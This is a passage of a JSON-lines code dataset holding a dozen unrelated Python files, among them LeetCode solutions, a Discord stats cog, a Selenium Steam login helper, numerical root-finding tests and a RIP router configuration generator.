必须与qt的timeout同时才能生效。\ndef sigint_handler(a0, a1):\n qApp = QCoreApplication.instance()\n print(\"SIGINT catched:\", a0, a1, qApp)\n qApp.quit()\n sys.exit(0)\n\ndef pytimeout():\n time.sleep(0.0000001)\n\nctrl_timer = None\ndef pyctrl():\n qInstallMessageHandler(qt_debug_handler)\n qApp = QCoreApplication.instance()\n ctrl_timer = QTimer(qApp)\n ctrl_timer.timeout.connect(pytimeout)\n ctrl_timer.start(100)\n \n signal.signal(signal.SIGINT, sigint_handler)\n \n","sub_path":"wxagent/qtutil.py","file_name":"qtutil.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"88735956","text":"\"\"\"\nYou have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.\n\nGiven n, find the total number of full staircase rows that can be formed.\n\nn is a non-negative integer and fits within the range of a 32-bit signed integer.\n\nExample 1:\n\nn = 5\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤\n\nBecause the 3rd row is incomplete, we return 2.\nExample 2:\n\nn = 8\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤ ¤\n¤ ¤\n\nBecause the 4th row is incomplete, we return 3.\n\"\"\"\n\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n row = 1\n while True:\n if row*(row+1) > 2*n:\n return row - 1\n else:\n row += 1\n \n# top solution O(1)\n# 1 + 2 + 3 + 4 + 5 + 6 + 7 + ... + x <= n\n# (x * ( x + 1)) / 2 <= n`\n# a = 1, b = 1, c = -2*n\n# x = (-1 + sqrt(1 - 4*1*(-2*n))) / 2\n# simplify: x = (-1 + sqrt(1 + 8.0*n)) / 2 \nimport math\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n return int((-1 + math.sqrt(1 + 8*n)) // 2) \n \n# top solution \n# binary search O(logn)\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n start, end= 0, n\n while start <= end:\n mid = start + (end - start) // 2\n if mid * (mid + 1) <= 2* n:\n start = mid + 1\n else:\n end = mid - 1\n return int(start - 1)","sub_path":"math/441.ArrangingCoins.py","file_name":"441.ArrangingCoins.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"48871130","text":"a=input(\"Enter:\")\n\nif a=='Hello':\n print('1 -google_kz.txt 2-google_paris.txt 3-google_uar.txt')\n b=int(input())\nif b==1:\n myfile1 = open('google_kz.txt','w')\n print(\"Name of a file is: \",myfile1.name)\n myfile1.write(input())\n print(myfile1)\n myfile1.close()\nelif b==2:\n myfile2=open('google_paris','w')\n print(\"Name of a file is: \",myfile2.name)\n myfile2.write(input())\n print(myfile2)\n myfile2.close()\nelif b==3:\n myfile3=open('google-uar', 'w')\n print(\"Name of a file is: \",myfile3.name)\n myfile3.write(input())\n print(myfile3)\nmyfile3.close()","sub_path":"part2_task17.py","file_name":"part2_task17.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"259204877","text":"\"\"\"Module which contains the information required about the aircraft\"\"\"\n\naircraft_data = {\n \"air_conditions_and_anti_icing_coefficient\": 1.0,\n \"brake_material\": \"composites\", # (composites, metal)\n \"capture_area_per_inlet\": 1.0,\n \"duct_material_factor\": 1.0,\n \"duct_shape_factor\": 1.0,\n \"duct_type\": 1.0,\n \"energy_absorption_required\": 1.0,\n \"engine_control_engine_type_coefficient\": 1.0,\n \"engine_weight\": 1.0,\n \"engine_type\": \"turbojet\", # (turbofan, turbojet, turboprop, reciprocating)\n \"fuel_system_type\": \"both\", # (self, non, both)\n \"fuselage_length\": 1.0,\n \"htp_total_planform_area\": 1.0,\n \"htp_thickness_at_root\": 1.0,\n \"htp_span\": 1.0,\n \"inlet_factor\": 1.0,\n \"instruments\": 1.0,\n \"is_dump_and_drain\": True,\n \"is_engine_wing_or_body_mounted\": \"wing\",\n \"is_full_round_spike_intake\": False,\n \"is_gravity_control\": True,\n \"is_half_spike_intake\": False,\n \"is_in_flight_refuel\": False,\n \"is_internal_engines\": False,\n \"is_turbofan\": False,\n \"is_turbojet\": True,\n \"is_variable_engine_intake\": False,\n \"leading_edge_sweep\": 1.0,\n \"maximum_dynamic_pressure\": 1.0,\n \"maximum_fuselage_height\": 1.0,\n \"maximum_sea_level_mach_number\": 1.0,\n \"maximum_thickness_ratio\": 1.0,\n \"maximum_static_pressure_at_engine_compressor_face\": 1.0,\n \"number_of_attendants\": 1.0,\n \"number_of_crew\": 1.0,\n \"number_of_crew_bunks\": 1.0,\n \"number_of_engines\": 1.0,\n \"number_of_flight_deck_stations\": 1.0,\n \"number_of_inlets\": 1.0,\n \"number_of_passengers\": 1.0,\n \"number_of_pilots\": 1.0,\n \"preload_provision\": 1.0,\n \"pressurized_volume\": 1.0,\n \"ramp_length_forward_of_throat_per_inlet\": 1.0,\n \"ratio_of_htp_height_to_vtp_height\": 1.0,\n \"rudder_area\": 1.0,\n \"sandwich_ratio\": 1.0,\n \"starter_type\": \"electrical\", # (electrical, pneumatic, cartridge) - value dependent on engine type, see docs\n \"subsonic_duct_length_per_inlet\": 1.0,\n \"surface_control_coefficient\": 1.0,\n \"sweep_at_half_chord\": 1.0,\n \"tail_moment_arm\": 1.0,\n \"takeoff_weight\": 1.0,\n \"taper_ratio\": 1.0,\n \"temperature_correction_factor\": 1.0,\n \"thickness_of_htp_root\": 1.0,\n \"toilet_ratio\": 1.0,\n \"total_fuselage_fuel\": 1.0,\n \"total_surface_control_area\": 1.0,\n \"total_wing_fuel\": 1.0,\n \"ultimate_cabin_pressure\": 1.0,\n \"ultimate_load_factor\": 1.0,\n \"vtp_area\": 1.0,\n \"vtp_aspect_ratio\": 1.0,\n \"vtp_quarter_chord_sweep\": 1.0,\n \"vtp_taper_ratio\": 1.0,\n \"weight_of_electronics_system\": 1.0,\n \"weight_of_engine\": 1.0,\n \"weight_of_fuel_system\": 1.0,\n \"wing_area\": 1.0,\n \"wing_aspect_ratio\": 1.0,\n \"wing_mac\": 1.0,\n \"wing_span\": 1.0,\n \"wing_variable_sweep_structural_factor\": 1.0\n}\n","sub_path":"performance/mass_estimation/old/nicolai/aircraft_info.py","file_name":"aircraft_info.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"543499561","text":"# Put here for ease of use with statcord\nfrom discord.ext import commands\nfrom bot_config import OWNER_ID\nimport statcord\nimport os\nimport dbl\nfrom pprint import pprint\n\n\nSTATCORD_TOKEN = os.getenv(\"STATCORD_TOKEN\")\nTOP_TOKEN = os.getenv(\"TOP_TOKEN\")\nTOP_AUTH = os.getenv(\"TOP_HOOK_AUTH\")\n\n\nclass StatcordPost(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.key = STATCORD_TOKEN\n self.api = statcord.Client(self.bot, self.key)\n self.api.start_loop()\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n if str(ctx.message.author.id) == str(OWNER_ID):\n return\n self.api.command_run(ctx)\n\n\nclass TopGG(commands.Cog):\n \"\"\"Handles interactions with the top.gg API\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.token = TOP_TOKEN\n self.dblpy = dbl.DBLClient(\n self.bot, self.token, autopost=True,\n )\n # Autopost will post your guild count every 30 minutes\n\n async def on_guild_post():\n print(\"Posted to top.gg\")\n\n\ndef setup(bot):\n bot.add_cog(StatcordPost(bot))\n bot.add_cog(TopGG(bot))\n","sub_path":"cogs/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"313453620","text":"#!/usr/bin/env python3\n\nimport math\nfrom scipy import optimize\nfrom sympy.abc import x\nfrom sympy import diff\nfrom sympy import lambdify\n\nfrom numerico.raizes.bisseccao import bisseccao\nfrom numerico.raizes.falsaposicao import falsaposicao\nfrom numerico.raizes.pontofixo import pontofixo1\nfrom numerico.raizes.pontofixo import pontofixo2\nfrom numerico.raizes.newtonraphson import newtonraphson\nfrom numerico.raizes.secante import secante\n\neps = 1e-15\n\n\ndef f1(x):\n \"\"\"x * log(x) - 1\"\"\"\n return x * math.log(x) - 1\n\n\ndef f2(x):\n \"\"\"x**3 - 9*x + 3\"\"\"\n return x**3 - 9 * x + 3\n\n\ndef phi(x):\n \"\"\"x**3/9 + 1/3\"\"\"\n return x**3 / 9 + 1 / 3\n\n\ndef f3(x):\n \"\"\"sin(x)\"\"\"\n return math.sin(x)\n\n\ndef main():\n print('\\n', f1.__doc__)\n f1raiz1 = bisseccao(f1, intervalo=[1, 10])\n f1raiz2 = falsaposicao(f1, intervalo=[1, 10])\n f1raiz4 = pontofixo2(f1, x0=2.6)\n # This calculates the f1'\n f1_ = lambdify(x, diff(f1.__doc__))\n f1raiz6 = newtonraphson(f1, f1_, 2.6)\n\n f1raiz7 = secante(f1, 1, 10)\n\n print(\"Bisseccao\", f1raiz1, f1(f1raiz1))\n print(\"FalsPosic\", f1raiz2, f1(f1raiz2))\n print(\"PontoFix2\", f1raiz4)\n print(\"NewtonRap\", f1raiz6, f1(f1raiz6))\n print(\"Secante \", f1raiz7, f1(f1raiz7))\n\n print('\\n', f2.__doc__)\n f2raiz1 = bisseccao(f2, intervalo=[-1, 1])\n f2raiz2 = falsaposicao(f2, intervalo=[-1, 1])\n f2raiz3 = pontofixo1(f2, phi, x0=0.3)\n f2raiz4 = pontofixo2(f2, x0=0.3)\n\n # This calculates the f2'\n f2_ = lambdify(x, diff(f2.__doc__))\n\n f2raiz6 = newtonraphson(f2, f2_, 0.3)\n f2raiz7 = secante(f2, -1, 1)\n print(\"Bisseccao\", f2raiz1, f2(f2raiz1))\n print(\"FalsPosic\", f2raiz2, f2(f2raiz2))\n print(\"PontoFix1\", f2raiz3, f2(f2raiz3))\n print(\"PontoFix2\", f2raiz4, f2(f2raiz4))\n print(\"SCIPYMPF \", f2raiz5, f2(f2raiz5))\n print(\"NewtonRap\", f2raiz6, f2(f2raiz6))\n print(\"Secante \", f2raiz7, f2(f2raiz7))\n\n print('\\n', f3.__doc__)\n f3raiz1 = bisseccao(f3, intervalo=[-1, 1], tol=eps)\n f3raiz2 = falsaposicao(f3, intervalo=[-1, 1], xtol=eps, ytol=eps)\n f3raiz4 = pontofixo2(f3, x0=0.1, tol=eps, maxiter=500)\n\n # This calculates the f3'\n f3_ = lambdify(x, diff(f3.__doc__))\n f3raiz6 = newtonraphson(f3, f3_, 0.5)\n f3raiz7 = secante(f3, -1, 1)\n\n print(\"Bisseccao\", f3raiz1, f3(f3raiz1))\n print(\"FalsPosic\", f3raiz2, f3(f3raiz2))\n print(\"PontoFix2\", f3raiz4, f3(f3raiz4))\n print(\"NewtonRap\", f3raiz6, f3(f3raiz6))\n print(\"Secante \", f3raiz7, f3(f3raiz7))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numerico/raiz/testes/raizes.py","file_name":"raizes.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"433476908","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n#\n# @AUTHOR: Rabbir\n# @FILE: \\rab_python_packages\\rab_steam.py\n# @DATE: 2021/02/03 Wed\n# @TIME: 17:18:46\n#\n# @DESCRIPTION: 共通 Steam 模块(操作基本基于 Selenium)\n\n\nimport hmac\nimport time\nimport base64\nimport struct\nimport selenium\nfrom hashlib import sha1\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom rab_python_packages import rab_logging\n\n\n# 日志记录\nrab_steam_logger = rab_logging.build_rab_logger()\n\n\n\"\"\"\n@description: r_steam 类\n-------\n@param:\n-------\n@return:\n\"\"\"\nclass r_steam:\n\n \"\"\"\n @description: 初始化\n -------\n @param:\n -------\n @return:\n \"\"\"\n def __init__(self, driver, username, password, token_flg=False, \\\n shared_secret=None, identity_secret=None):\n self.driver = driver\n self.username = username\n self.password = password\n # 令牌标识\n self.token_flg = token_flg\n # 令牌分享码\n self.shared_secret = shared_secret\n self.identity_secret = identity_secret\n\n \"\"\"\n @description: 切换至 Steam 登录窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_steam_login_window(self, exclude_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 判断不包含排除字段但是包含 STEAM 字段的窗口即为 STEAM 登录窗口\n if (exclude_field.lower() not in str(self.driver.title).lower()\n and \"steam\" in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n \n \"\"\"\n @description: 切换回原窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_origin_window(self, fill_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 包含满足要求字段的窗口即为原窗口\n if (fill_field.lower() in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n\n \"\"\"\n @description: 生成 STEAM 登录一次性令牌\n -------\n @param:\n -------\n @return:\n \"\"\"\n def generate_one_time_code(self):\n timestamp = int(time.time())\n time_buffer = struct.pack(\">Q\", timestamp//30)\n time_hmac = hmac.new(base64.b64decode(self.shared_secret),\n time_buffer,\n digestmod=sha1).digest()\n begin = ord(time_hmac[19:20]) & 0xf\n full_code = struct.unpack(\">I\",\n time_hmac[begin:begin+4])[0] & 0x7fffffff\n chars = \"23456789BCDFGHJKMNPQRTVWXY\"\n code = \"\"\n for j in range(5):\n full_code, i = divmod(full_code, len(chars))\n code += chars[i]\n return code\n\n \"\"\"\n @description: 在 STEAM 登录界面实现登录\n -------\n @param:\n -------\n @return:\n \"\"\"\n def do_steam_login(self):\n try:\n # 等待登录按钮出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='imageLogin']\")))\n # 检查是否已经登录\n try:\n time.sleep(1)\n # 如果有当前账户名说明已经登录完成了\n account_div = self.driver.find_element_by_class_name(\n \"OpenID_loggedInAccount\")\n logined_flg = True\n except Exception as e:\n logined_flg = False\n # 登录的情况下进行登出操作\n if (logined_flg):\n print(\"Steam 当前已经处于登录状态,尝试登出...\")\n # 选择登出这个账号\n logout_div_a = self.driver.find_element_by_xpath(\n \"//div[@class='OpenID_Logout']/a\")\n logout_div_a.click()\n # STEAM 用户名输入框\n steam_account_name_input = self.driver \\\n .find_element_by_id(\"steamAccountName\")\n # STEAM 密码输入框\n steam_password_input = self.driver \\\n .find_element_by_id(\"steamPassword\")\n # 输入用户名和密码\n steam_account_name_input.send_keys(self.username)\n steam_password_input.send_keys(self.password)\n # 点击登录按钮\n self.driver.find_element_by_id(\"imageLogin\").click()\n # 无令牌的情况下或者当前已经是登录状态就算登录成功\n if (not self.token_flg):\n return True\n else:\n # 等待需要令牌的弹窗出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='twofactorcode_entry']\")))\n twofactorcode_entry_input = self.driver.find_element_by_id(\n \"twofactorcode_entry\")\n # 等待三秒弹窗可见后,生成并输入令牌\n time.sleep(3)\n twofactorcode_entry_input.send_keys(\n self.generate_one_time_code())\n # 提交按钮\n submit_btn = self.driver.find_element_by_xpath(\n \"//div[@id='login_twofactorauth_buttonset_entercode']/div\")\n submit_btn.click()\n return True\n except Exception as e:\n # 登录失败\n rab_steam_logger.error(\"Steam 登录界面操作出错!错误信息:\" + str(e))\n return False\n\n \"\"\"\n @description: 等待 Steam 登录成功并自动关闭窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def wait_steam_login_success(self, fill_field):\n for i in range(0, 10):\n if (len(self.driver.window_handles) == 1\n and fill_field.lower() in str(self.driver.title).lower()):\n return True\n else:\n time.sleep(2)\n continue\n return False\n\n\n\"\"\"\n@description: 单体测试\n-------\n@param:\n-------\n@return:\n\"\"\"\nif __name__ == \"__main__\":\n print(\"todo...\")\n","sub_path":"rab_steam.py","file_name":"rab_steam.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"20098691","text":"import inspect\nimport contextlib\nimport io\n\n\ndef write_stat(name, content):\n \"\"\"\n Utility function to pretty-print multi-line information in the following form:\n [Name]: [line 1]\n [line 2]\n ...\n :param name: Name of the stat\n :param content: The potentially multi-line information to be printed\n \"\"\"\n content = content.replace(\"\\n\", \"\\n\\t\")\n print(f\"{name}:\\t{content}\")\n\n\ndef reflect(func):\n \"\"\"\n Quine is a program which takes no input but outputs a copy of its own code.\n So function reflect is not a quine, because:\n 1. It takes function as input.\n 2. Its output depends on a given function rather than producing it by itself.\n\n Decorator that show certain stats and the source code on the wrapped function.\n :param func: Function to be wrapped\n \"\"\"\n\n def wrapper(*args, **kwargs):\n stdout_redir = io.StringIO()\n with contextlib.redirect_stdout(stdout_redir):\n func(*args, **kwargs)\n\n output = stdout_redir.getvalue()\n source = inspect.getsource(func)\n\n sourcelines, _ = inspect.getsourcelines(func)\n \n # Output\n write_stat(\"Name\", func.__name__)\n write_stat(\"Type\", str(type(func)))\n write_stat(\"Sign\", str(inspect.signature(func)))\n print()\n write_stat(\"Args\", f\"positional {args}\\nkey=worded {kwargs}\")\n print()\n write_stat(\"Doc\", str(inspect.getdoc(func)))\n print()\n write_stat(\"Source\", source)\n # For some reason, inspect.getsource adds a newline at the end of the function,\n # thus no print() here\n write_stat(\"Output\", output)\n print()\n\n return wrapper\n","sub_path":"Assignment3/3/reflect.py","file_name":"reflect.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"326896499","text":"import random\nimport math\nimport os\nimport re\nimport sys\n\nimport dijkstras\n\nfrom router import RouteInfos\n\nsys.path.append('../')\n\n# ////////////////////////////// OPTIONS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ #\n# Router ids must be sequential, starting from 1, skipping no numbers.\nundir_adj_list = \"\"\"\n1:2\n\"\"\"\n\nexample_num = \"10\"\nupdate_period = \"5\"\nmin_cost = 1\nmax_cost = 1\n\n# Used to weight costs.\naverage_cost = None # Can be set to None to have no weighting in the range (min_cost, max_cost)\n# \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ OPTIONS ////////////////////////////// #\n\n# Build the costs list, containing the costs that routers will randomly choose from, if costs arent defined in adj list.\nif average_cost:\n cost_range = max_cost - min_cost + 1\n costs = []\n # Decent guess at costs with given average.\n for i in range(min_cost, max_cost + 1):\n try:\n amount = round(cost_range / (abs(i - average_cost)))\n except ZeroDivisionError:\n amount = cost_range * 5\n costs += [i] * amount\n # Brute force until the average of the costs is far better.\n while True:\n costs_average = sum(costs)/len(costs)\n difference = costs_average - average_cost\n if abs(difference) < 0.0001:\n break\n if difference > 0:\n costs.append(random.randint(min_cost, math.floor(average_cost)))\n else:\n costs.append(random.randint(math.ceil(average_cost), max_cost))\nelse:\n costs = [i for i in range(min_cost, max_cost + 1)]\n\n\n# Check given undirected adjacency list\nrouter_ids = set(\n map(\n int,\n [item for item in map(str.strip, re.split(\"[:,]|(?:\\n|\\r\\n|\\r)\", undir_adj_list.strip())) if item.isdigit()]\n )\n)\nexpected_router_ids = set(range(1, int(max(router_ids)) + 1))\nif router_ids != expected_router_ids:\n print(\"Malformed adjacency list given.\")\n print(\"The following router ids were skipped:\", expected_router_ids - router_ids)\n exit()\n\n\nclass Edge(frozenset):\n def __new__(cls, *args):\n return super().__new__(cls, args)\n\n def __str__(self):\n return str(set(map(str, self)))\n\n def __repr__(self):\n return str(set(map(str, self)))\n\n\n# Warn if example configuration already exists.\nconfig_path = \"../configurations/example-\" + example_num + \"/\"\nif os.path.isdir(config_path):\n confirm = input(\n \"Example {} already exists. Enter 'y' to confirm overwrite (will invalidate any diagrams): \".format(example_num)\n ).strip().lower()\n if confirm != \"y\":\n exit()\n\n# Build the edges dictionary, mapping edges (immutable pairs of router ids) to costs (randomly generated), and\n# build the connections dictionary, mapping router ids to the set of routers they are connected to.\nedge_costs = {}\nconnections = {str(i): set() for i in router_ids}\nfor line in undir_adj_list.strip().splitlines():\n line = line.strip()\n parts = line.split(\":\")\n router = parts[0]\n\n full_neighbours = set(parts[1].split(\",\"))\n for neighbour in full_neighbours:\n cost_parts = neighbour.split('w')\n neighbour = cost_parts[0]\n if len(cost_parts) > 1:\n edge_costs[Edge(router, neighbour)] = int(cost_parts[1])\n else:\n edge_costs[Edge(router, neighbour)] = random.choice(costs)\n\n neighbours = set([part.split('w')[0] for part in parts[1].split(\",\")])\n\n connections[router] |= neighbours\n for neighbour in neighbours:\n connections[neighbour] |= {router}\n\n# Build the Graph object.\ngraph = dijkstras.Graph()\nfor router_id in connections:\n graph.add_node(router_id)\nfor edge, cost in edge_costs.items():\n graph.add_edge(*edge, distance=cost)\n\n# Initialise both output matrices.\nnum_routers = len(connections.keys())\nnum_edges = len(edge_costs.keys())\nadjacency_matrix = [[0 for i in range(num_routers)] for j in range(num_routers)]\nincidence_matrix = [[0 for k in range(num_edges)] for l in range(num_routers)]\n\n# Build both output matrices.\nfor edge_num, ((node_1, node_2), cost) in enumerate(edge_costs.items()):\n adjacency_matrix[int(node_1) - 1][int(node_2) - 1] = cost\n adjacency_matrix[int(node_2) - 1][int(node_1) - 1] = cost\n\n incidence_matrix[int(node_1) - 1][edge_num] = cost\n incidence_matrix[int(node_2) - 1][edge_num] = cost\n\n# Cross check matrices validity\npassed = True\nfor column in zip(*incidence_matrix):\n cost = max(column)\n node_1, node_2 = [index + 1 for index, cost in enumerate(column) if cost != 0]\n\n passed = adjacency_matrix[int(node_1) - 1][int(node_2) - 1] == cost if passed else False\n passed = adjacency_matrix[int(node_2) - 1][int(node_1) - 1] == cost if passed else False\ncount = 0\nfor index_1, row in enumerate(adjacency_matrix):\n for index_2, cost in enumerate(row):\n column = [0 for _ in range(num_routers)]\n router_id_1 = index_1 + 1\n column[index_1] = cost\n column[index_2] = cost\n if any(column):\n passed = column in [list(tuple_column) for tuple_column in zip(*incidence_matrix)] if passed else False\n count += 1\npassed = count / 2 == num_edges if passed else False\nif not passed:\n print(\"Sorry! Matrices malformed.\")\n exit()\n\n# Build config files needed for router operation.\n\n\ndef pad_zero(str_num):\n if len(str_num) == 2:\n return str_num\n elif len(str_num) == 1:\n return \"0\" + str_num\n\nfor router in connections:\n config = \"router-id \" + router + \"\\n\"\n config += \"input-ports \"\n for neighbour in connections[router]:\n config += \"5\" + pad_zero(router) + pad_zero(neighbour) + \", \"\n config = config[:-2]\n config += \"\\noutputs \"\n for neighbour in connections[router]:\n cost = edge_costs[Edge(router, neighbour)]\n config += \"5\" + pad_zero(neighbour) + pad_zero(router) + \"/\" + str(cost) + \"/\" + neighbour + \", \"\n config = config[:-2]\n config += \"\\nupdate-period \" + update_period\n config_filename = \"example-\" + example_num + \"-config-\" + router + \".txt\"\n os.makedirs(os.path.dirname(config_path), exist_ok=True)\n with open(config_path + config_filename, \"w+\") as config_file:\n config_file.write(config)\n\n# Build expected converged routing table files\nfor router_id in router_ids:\n router_id = str(router_id)\n converged_routing_table = \"{\\n\"\n for target_router_id in router_ids:\n target_router_id = str(target_router_id)\n if router_id == target_router_id:\n continue\n try:\n cost, path = dijkstras.shortest_path(graph, router_id, target_router_id)\n if cost >= 16:\n print(\"WARNING! A minimum cost path of {} was found (16 or higher).\".format(cost))\n input(\"Enter anything to continue...\")\n first_hop = path[1] # path[0] is router_id itself.\n converged_routing_table += '\\t\"{}\": {{\\n'.format(target_router_id)\n converged_routing_table += '\\t\\t\"{}\": {},\\n'.format(RouteInfos.FIRST_HOP, first_hop)\n converged_routing_table += '\\t\\t\"{}\": {}\\n'.format(RouteInfos.COST, cost)\n converged_routing_table += \"\\t},\\n\"\n except KeyError:\n print(\"Could not create a path between two nodes of the graph. This probably means the graph described \"\n \"by your adjacency list is disjoint\")\n exit(1)\n converged_routing_table = converged_routing_table[0:-2]\n converged_routing_table += \"\\n}\"\n expected_dir_path = config_path + \"converged-routing-tables/\"\n os.makedirs(os.path.dirname(expected_dir_path), exist_ok=True)\n with open(expected_dir_path + \"routing-table-\" + router_id + \".json\", \"w+\") as expected_file:\n expected_file.write(converged_routing_table)\n\n# Print results.\nprint(\"\\nConfig files successfully created for example network\", example_num + \".\\n\")\nprint(\"VISUALISE USING THIS ONLINE TOOL: http://graphonline.ru/en/\")\nprint(\"\\nADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n print(\",\".join(map(str, line)))\nprint(\"\\nNO COST ADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n line = [1 if i != 0 else 0 for i in line]\n print(\",\".join(map(str, line)))\nprint(\"\\nINCIDENCE MATRIX:\")\nfor line in incidence_matrix:\n print(\",\".join(map(str, line)))\n","sub_path":"scripts/example_config_generator.py","file_name":"example_config_generator.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"319231862","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-intel/egg/ndg/xacml/parsers/etree/actionreader.py\n# Compiled at: 2011-02-11 08:34:11\n\"\"\"NDG XACML ElementTree based parser for Action type\n\nNERC DataGrid\n\"\"\"\n__author__ = 'P J Kershaw'\n__date__ = '16/03/10'\n__copyright__ = '(C) 2010 Science and Technology Facilities Council'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__license__ = 'BSD - see LICENSE file in top-level directory'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__revision__ = '$Id: actionreader.py 7109 2010-06-28 12:54:57Z pjkersha $'\nfrom ndg.xacml.core.action import Action\nfrom ndg.xacml.parsers.etree.targetchildreader import TargetChildReader\n\nclass ActionReader(TargetChildReader):\n \"\"\"ElementTree based parser for Action type\n @cvar TYPE: XACML type to instantiate from parsed object\n @type TYPE: type\n \"\"\"\n TYPE = Action","sub_path":"pycfiles/ndg_xacml-0.5.1-py2.7/actionreader.py","file_name":"actionreader.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"29781321","text":"import mock\n\nfrom mopidy.utils import locale_decode\n\nfrom tests import unittest\n\n\n@mock.patch('mopidy.utils.locale.getpreferredencoding')\nclass LocaleDecodeTest(unittest.TestCase):\n def test_can_decode_utf8_strings_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n result = locale_decode(\n '[Errno 98] Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_can_decode_an_ioerror_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n error = IOError(98, 'Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n result = locale_decode(error)\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_does_not_use_locale_to_decode_unicode_strings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode(u'abc')\n\n self.assertFalse(mock.called)\n\n def test_does_not_use_locale_to_decode_ascii_bytestrings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode('abc')\n\n self.assertFalse(mock.called)\n","sub_path":"tests/utils/decode_test.py","file_name":"decode_test.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"617960780","text":"class Instance(object):\n def __init__(self, obj):\n self.id = obj.id\n self.tags = obj.tags\n self.size = obj.instance_type\n self.launch_time = obj.launch_time\n self._placement = obj.placement\n self._state = obj.state\n self._os = guess_os(obj)\n self._reserved = False\n self._prices = {\n 'current': 0.0,\n 'best': 0.0,\n }\n\n @property\n def current(self):\n return self._prices['current']\n\n @current.setter\n def current(self, value):\n self._prices['current'] = value\n\n @property\n def best(self):\n return self._prices['best']\n\n @best.setter\n def best(self, value):\n self._prices['best'] = value\n\n @property\n def reserved(self):\n if self._reserved:\n return 'Yes'\n else:\n return 'No'\n\n @reserved.setter\n def reserved(self, value):\n if value == 'Yes':\n self._reserved = True\n elif value == 'No':\n self._reserved = False\n else:\n raise ValueError\n\n @property\n def name(self):\n names = [tag for tag in self.tags if tag['Key'] == 'Name']\n if names is None:\n return ''\n else:\n return names[0]['Value']\n\n @property\n def availability_zone(self):\n return self._placement['AvailabilityZone']\n\n @property\n def region(self):\n return self._placement['AvailabilityZone'][:-1]\n\n @property\n def key(self):\n return self._os[1]\n\n @property\n def operating_system(self):\n return self._os[0]\n\n @property\n def state(self):\n return self._state['Name']\n\n def match_reserved_instance(self, reserved):\n if any((self.state != 'running',\n reserved['State'] != 'active',\n reserved['InstancesLeft'] == 0,\n reserved['ProductDescription'] != self.operating_system,\n reserved['InstanceType'] != self.size,\n 